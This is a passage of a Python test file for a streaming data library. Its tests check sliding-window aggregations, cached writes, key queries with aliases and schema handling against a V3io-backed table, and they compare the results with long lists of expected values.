'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_1h', 'number_of_stuff_sum_2h', 'number_of_stuff_sum_24h',
'number_of_stuff_avg_1h', 'number_of_stuff_avg_2h', 'number_of_stuff_avg_24h',
'number_of_stuff_min_1h', 'number_of_stuff_min_2h', 'number_of_stuff_min_24h',
'number_of_stuff_max_1h', 'number_of_stuff_max_2h', 'number_of_stuff_max_24h'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 45,
'number_of_stuff_min_1h': 8, 'number_of_stuff_min_2h': 6, 'number_of_stuff_min_24h': 0,
'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9, 'number_of_stuff_max_24h': 9,
'number_of_stuff_avg_1h': 8.5, 'number_of_stuff_avg_2h': 7.5, 'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('query_aggregations', [['number_of_stuff_sum_1h', 'number_of_stuff_avg_2h'],
['number_of_stuff_avg_2h', 'number_of_stuff_sum_1h']])
def test_aggregate_and_query_with_dependent_aggrs_different_windows(setup_teardown_test, query_aggregations):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['1h', '2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(query_aggregations,
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'number_of_stuff_sum_1h': 17, 'number_of_stuff_avg_2h': 7.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_aggregate_by_key_one_underlying_window(setup_teardown_test, partitioned_by_key, flush_interval):
expected = {1: [{'number_of_stuff_count_1h': 1, 'other_stuff_sum_1h': 0.0, 'col1': 0},
{'number_of_stuff_count_1h': 2, 'other_stuff_sum_1h': 1.0, 'col1': 1},
{'number_of_stuff_count_1h': 3, 'other_stuff_sum_1h': 3.0, 'col1': 2}],
2: [{'number_of_stuff_count_1h': 4, 'other_stuff_sum_1h': 6.0, 'col1': 3},
{'number_of_stuff_count_1h': 5, 'other_stuff_sum_1h': 10.0, 'col1': 4},
{'number_of_stuff_count_1h': 6, 'other_stuff_sum_1h': 15.0, 'col1': 5}],
3: [{'number_of_stuff_count_1h': 7, 'other_stuff_sum_1h': 21.0, 'col1': 6},
{'number_of_stuff_count_1h': 8, 'other_stuff_sum_1h': 28.0, 'col1': 7},
{'number_of_stuff_count_1h': 9, 'other_stuff_sum_1h': 36.0, 'col1': 8}]}
items_in_ingest_batch = 3
current_index = 0
for current_expected in expected.values():
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key, flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['1h'], '10m')),
FieldAggregator('other_stuff', 'col1', ['sum'],
SlidingWindows(['1h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(items_in_ingest_batch):
data = {'col1': current_index}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=1 * current_index))
current_index = current_index + 1
controller.terminate()
actual = controller.await_termination()
assert actual == current_expected, \
f'actual did not match expected. \n actual: {actual} \n expected: {current_expected}'
@pytest.mark.parametrize('partitioned_by_key', [True, False])
def test_aggregate_by_key_two_underlying_windows(setup_teardown_test, partitioned_by_key):
expected = {1: [{'number_of_stuff_count_24h': 1, 'other_stuff_sum_24h': 0.0, 'col1': 0},
{'number_of_stuff_count_24h': 2, 'other_stuff_sum_24h': 1.0, 'col1': 1},
{'number_of_stuff_count_24h': 3, 'other_stuff_sum_24h': 3.0, 'col1': 2}],
2: [{'number_of_stuff_count_24h': 4, 'other_stuff_sum_24h': 6.0, 'col1': 3},
{'number_of_stuff_count_24h': 5, 'other_stuff_sum_24h': 10.0, 'col1': 4},
{'number_of_stuff_count_24h': 6, 'other_stuff_sum_24h': 15.0, 'col1': 5}],
3: [{'number_of_stuff_count_24h': 7, 'other_stuff_sum_24h': 21.0, 'col1': 6},
{'number_of_stuff_count_24h': 8, 'other_stuff_sum_24h': 28.0, 'col1': 7},
{'number_of_stuff_count_24h': 9, 'other_stuff_sum_24h': 36.0, 'col1': 8}]}
items_in_ingest_batch = 3
current_index = 0
for current_expected in expected.values():
table = Table(setup_teardown_test, V3ioDriver(), partitioned_by_key=partitioned_by_key)
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['count'],
SlidingWindows(['24h'], '10m')),
FieldAggregator('other_stuff', 'col1', ['sum'],
SlidingWindows(['24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(items_in_ingest_batch):
data = {'col1': current_index}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * current_index))
current_index = current_index + 1
controller.terminate()
actual = controller.await_termination()
assert actual == current_expected, \
f'actual did not match expected. \n actual: {actual} \n expected: {current_expected}'
def test_aggregate_by_key_with_extra_aliases(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0, 'time_since_activity': 0, 'total_activities': 1,
'color': 'blue'},
{'number_of_stuff_sum_2h': 1, 'number_of_stuff_avg_2h': 0.5, 'col1': 1, 'time_since_activity': 1500, 'total_activities': 2,
'color': 'blue'},
{'number_of_stuff_sum_2h': 3, 'number_of_stuff_avg_2h': 1.0, 'col1': 2, 'time_since_activity': 3000, 'total_activities': 3,
'color': 'blue'},
{'number_of_stuff_sum_2h': 6, 'number_of_stuff_avg_2h': 1.5, 'col1': 3, 'time_since_activity': 4500, 'total_activities': 4,
'color': 'blue'},
{'number_of_stuff_sum_2h': 10, 'number_of_stuff_avg_2h': 2.0, 'col1': 4, 'time_since_activity': 6000, 'total_activities': 5,
'color': 'blue'},
{'number_of_stuff_sum_2h': 15, 'number_of_stuff_avg_2h': 3.0, 'col1': 5, 'time_since_activity': 7500, 'total_activities': 6,
'color': 'blue'},
{'number_of_stuff_sum_2h': 20, 'number_of_stuff_avg_2h': 4.0, 'col1': 6, 'time_since_activity': 9000, 'total_activities': 7,
'color': 'blue'},
{'number_of_stuff_sum_2h': 25, 'number_of_stuff_avg_2h': 5.0, 'col1': 7, 'time_since_activity': 10500, 'total_activities': 8,
'color': 'blue'},
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 6.0, 'col1': 8, 'time_since_activity': 12000, 'total_activities': 9,
'color': 'blue'},
{'number_of_stuff_sum_2h': 35, 'number_of_stuff_avg_2h': 7.0, 'col1': 9, 'time_since_activity': 13500, 'total_activities': 10,
'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_2h', 'number_of_stuff_avg_2h', 'color', 'age', 'iss', 'sometime'],
other_table, aliases={'color': 'external.color', 'iss': 'external.iss'}),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 7.5, 'col1': 10, 'external.color': 'blue', 'age': 41, 'external.iss': True,
'sometime': test_base_time}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_write_cache_with_aggregations(setup_teardown_test, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg'],
SlidingWindows(['2h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 0, 'number_of_stuff_avg_2h': 0.0, 'col1': 0, 'time_since_activity': 0, 'total_activities': 1,
'color': 'blue'},
{'number_of_stuff_sum_2h': 1, 'number_of_stuff_avg_2h': 0.5, 'col1': 1, 'time_since_activity': 1500, 'total_activities': 2,
'color': 'blue'},
{'number_of_stuff_sum_2h': 3, 'number_of_stuff_avg_2h': 1.0, 'col1': 2, 'time_since_activity': 3000, 'total_activities': 3,
'color': 'blue'},
{'number_of_stuff_sum_2h': 6, 'number_of_stuff_avg_2h': 1.5, 'col1': 3, 'time_since_activity': 4500, 'total_activities': 4,
'color': 'blue'},
{'number_of_stuff_sum_2h': 10, 'number_of_stuff_avg_2h': 2.0, 'col1': 4, 'time_since_activity': 6000, 'total_activities': 5,
'color': 'blue'},
{'number_of_stuff_sum_2h': 15, 'number_of_stuff_avg_2h': 3.0, 'col1': 5, 'time_since_activity': 7500, 'total_activities': 6,
'color': 'blue'},
{'number_of_stuff_sum_2h': 20, 'number_of_stuff_avg_2h': 4.0, 'col1': 6, 'time_since_activity': 9000, 'total_activities': 7,
'color': 'blue'},
{'number_of_stuff_sum_2h': 25, 'number_of_stuff_avg_2h': 5.0, 'col1': 7, 'time_since_activity': 10500, 'total_activities': 8,
'color': 'blue'},
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 6.0, 'col1': 8, 'time_since_activity': 12000, 'total_activities': 9,
'color': 'blue'},
{'number_of_stuff_sum_2h': 35, 'number_of_stuff_avg_2h': 7.0, 'col1': 9, 'time_since_activity': 13500, 'total_activities': 10,
'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
controller = build_flow([
SyncEmitSource(),
QueryByKey(['number_of_stuff_sum_2h', 'number_of_stuff_avg_2h', 'color', 'age', 'iss', 'sometime'],
other_table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_2h': 30, 'number_of_stuff_avg_2h': 7.5, 'col1': 10, 'color': 'blue', 'age': 41, 'iss': True,
'sometime': test_base_time}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
@pytest.mark.parametrize('flush_interval', [None, 1])
def test_write_cache(setup_teardown_test, flush_interval):
table = Table(setup_teardown_test, V3ioDriver(), flush_interval_secs=flush_interval)
table['tal'] = {'color': 'blue', 'age': 41, 'iss': True, 'sometime': test_base_time}
def enrich(event, state):
if 'first_activity' not in state:
state['first_activity'] = event.time
event.body['time_since_activity'] = (event.time - state['first_activity']).seconds
state['last_event'] = event.time
event.body['total_activities'] = state['total_activities'] = state.get('total_activities', 0) + 1
event.body['color'] = state['color']
return event, state
controller = build_flow([
SyncEmitSource(),
MapWithState(table, enrich, group_by_key=True, full_event=True),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'time_since_activity': 0, 'total_activities': 1, 'color': 'blue'},
{'col1': 1, 'time_since_activity': 1500, 'total_activities': 2, 'color': 'blue'},
{'col1': 2, 'time_since_activity': 3000, 'total_activities': 3, 'color': 'blue'},
{'col1': 3, 'time_since_activity': 4500, 'total_activities': 4, 'color': 'blue'},
{'col1': 4, 'time_since_activity': 6000, 'total_activities': 5, 'color': 'blue'},
{'col1': 5, 'time_since_activity': 7500, 'total_activities': 6, 'color': 'blue'},
{'col1': 6, 'time_since_activity': 9000, 'total_activities': 7, 'color': 'blue'},
{'col1': 7, 'time_since_activity': 10500, 'total_activities': 8, 'color': 'blue'},
{'col1': 8, 'time_since_activity': 12000, 'total_activities': 9, 'color': 'blue'},
{'col1': 9, 'time_since_activity': 13500, 'total_activities': 10, 'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
other_table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
MapWithState(other_table, enrich, group_by_key=True, full_event=True),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
base_time = test_base_time + timedelta(minutes=25 * items_in_ingest_batch)
data = {'col1': items_in_ingest_batch}
controller.emit(data, 'tal', base_time)
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 10, 'time_since_activity': 15000, 'total_activities': 11, 'color': 'blue'}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_with_string_table(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
table_name = 'tals-table'
context = Context(initial_tables={table_name: table})
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max', 'sqr'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table_name, context=context),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_sqr_1h': 0, 'number_of_stuff_sqr_2h': 0, 'number_of_stuff_sqr_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0, 'col1': 0},
{'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_sqr_1h': 1, 'number_of_stuff_sqr_2h': 1, 'number_of_stuff_sqr_24h': 1,
'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5, 'col1': 1},
{'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_sqr_1h': 5, 'number_of_stuff_sqr_2h': 5, 'number_of_stuff_sqr_24h': 5,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0, 'col1': 2},
{'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_sqr_1h': 14, 'number_of_stuff_sqr_2h': 14, 'number_of_stuff_sqr_24h': 14,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5, 'col1': 3},
{'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_sqr_1h': 29, 'number_of_stuff_sqr_2h': 30, 'number_of_stuff_sqr_24h': 30,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0, 'col1': 4},
{'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_sqr_1h': 50, 'number_of_stuff_sqr_2h': 55, 'number_of_stuff_sqr_24h': 55,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5, 'col1': 5},
{'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_sqr_1h': 77, 'number_of_stuff_sqr_2h': 90, 'number_of_stuff_sqr_24h': 91,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0, 'col1': 6},
{'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_sqr_1h': 110, 'number_of_stuff_sqr_2h': 135, 'number_of_stuff_sqr_24h': 140,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5, 'col1': 7},
{'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_sqr_1h': 149, 'number_of_stuff_sqr_2h': 190, 'number_of_stuff_sqr_24h': 204,
'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0, 'col1': 8},
{'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_sqr_1h': 194, 'number_of_stuff_sqr_2h': 255, 'number_of_stuff_sqr_24h': 285,
'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5, 'col1': 9}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def _assert_schema_equal(actual, expected):
assert len(actual) == len(expected)
for key, item in actual.items():
current_expected = expected[key]
assert item['period_millis'] == current_expected['period_millis']
assert set(item['aggregates']) == set(current_expected['aggregates'])
async def load_schema(path):
driver = V3ioDriver()
container, table_path = _split_path(path)
res = await driver._load_schema(container, table_path)
await driver.close()
return res
def test_modify_schema(setup_teardown_test):
table = Table(setup_teardown_test, V3ioDriver())
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator('number_of_stuff', 'col1', ['sum', 'avg', 'min', 'max'],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
table),
NoSqlTarget(table),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
items_in_ingest_batch = 10
for i in range(items_in_ingest_batch):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15,
'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5,
'number_of_stuff_max_2h': 5, 'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21,
'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6,
'number_of_stuff_max_2h': 6, 'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 3.0},
